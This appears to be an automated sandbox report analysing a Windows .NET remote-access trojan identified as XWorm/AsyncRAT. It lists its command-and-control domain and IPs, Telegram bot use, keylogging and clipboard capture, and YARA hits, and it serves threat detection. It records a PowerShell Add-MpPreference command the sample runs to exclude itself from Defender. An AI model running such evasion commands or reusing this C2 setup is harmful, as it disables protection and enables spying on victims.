Source:	Binary string: \??\C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.PDB source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595773433.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbSK source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Drawing.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: mscorlib.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Management.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: fSgG.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source:	Binary string: symbols\dll\mscorlib.pdbLb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER7A57.tmp.dmp.13.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49734 -> 147.185.221.22:55202
Source: Network traffic	Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.5:49708 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: various-wages.gl.at.ply.gg

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, type: UNPACKEDPE

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49710 -> 147.185.221.22:55202

HTTP GET or POST without a user agent

Source: global traffic

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 147.185.221.22 147.185.221.22

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: SALSGIVERUS SALSGIVERUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: various-wages.gl.at.ply.gg

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3597124997.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP
Source: Amcache.hve.13.dr	String found in binary or memory: http://upx.sf.net
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3597124997.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

Creates a window with clipboard capturing capabilities

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Detected potential crypto function

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 0_2_009DD3A4	0_2_009DD3A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 0_2_04BB0006	0_2_04BB0006
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 0_2_04BB0040	0_2_04BB0040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_011DD3A8	5_2_011DD3A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_011D13F8	5_2_011D13F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_054385C0	5_2_054385C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_0543D190	5_2_0543D190
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_05439358	5_2_05439358
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_05435384	5_2_05435384
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_05435990	5_2_05435990
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_054327A0	5_2_054327A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_054327B0	5_2_054327B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_054303CC	5_2_054303CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_0543AA71	5_2_0543AA71
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_05456408	5_2_05456408
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_05453C50	5_2_05453C50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_05456CD8	5_2_05456CD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_05458128	5_2_05458128
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_054560C0	5_2_054560C0

One or more processes crash

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 1128

Sample file is different than original file name gathered from version info

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088989997.00000000035B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000000.2075574675.0000000000232000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamefSgG.exe8 vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2102027990.0000000006890000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088204496.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2102129900.0000000006B70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600180829.0000000005569000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Binary or memory string: OriginalFilenamefSgG.exe8 vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Uses 32bit PE files

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Settings.cs	Base64 encoded string: 'jnxDCgaTMcMwYhKdiA0/tKI8/Kg/cnn8GHJWZDKEh0okrDm+mNQ2A54NeeFeivwu', 'L0+anQz0xL4RJfOh6xkSyVpKsrstIjy+9VAEvWldBMgNh4coKLQIfFbJKAtiWawL', 'm6aTSUtqKTZEVViuXc98ZpgQUptgC/4Z08GdDnEjSZygd3cs9h6PtA8rplIslDg/'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Settings.cs	Base64 encoded string: 'jnxDCgaTMcMwYhKdiA0/tKI8/Kg/cnn8GHJWZDKEh0okrDm+mNQ2A54NeeFeivwu', 'L0+anQz0xL4RJfOh6xkSyVpKsrstIjy+9VAEvWldBMgNh4coKLQIfFbJKAtiWawL', 'm6aTSUtqKTZEVViuXc98ZpgQUptgC/4Z08GdDnEjSZygd3cs9h6PtA8rplIslDg/'

Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, D0OGH51qG7TrJUYkAK.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, D0OGH51qG7TrJUYkAK.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, D0OGH51qG7TrJUYkAK.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, D0OGH51qG7TrJUYkAK.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, D0OGH51qG7TrJUYkAK.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, D0OGH51qG7TrJUYkAK.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, D0OGH51qG7TrJUYkAK.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, D0OGH51qG7TrJUYkAK.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, D0OGH51qG7TrJUYkAK.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, YqOlYl2eFwtfPkt21E.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, YqOlYl2eFwtfPkt21E.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, YqOlYl2eFwtfPkt21E.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/11@2/2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6552
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Mutant created: \Sessions\1\BaseNamedObjects\lsODhik7XANOkJAK

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqvi3wjx.qt2.ps1

Jump to behavior

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000000.2075574675.0000000000232000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: INSERT INTO Product(Id, Name, Units, Price, CategoryId)VALUES (@id, @name, @units, @price, @idcat); SELECT last_insert_rowid()

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 1128
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
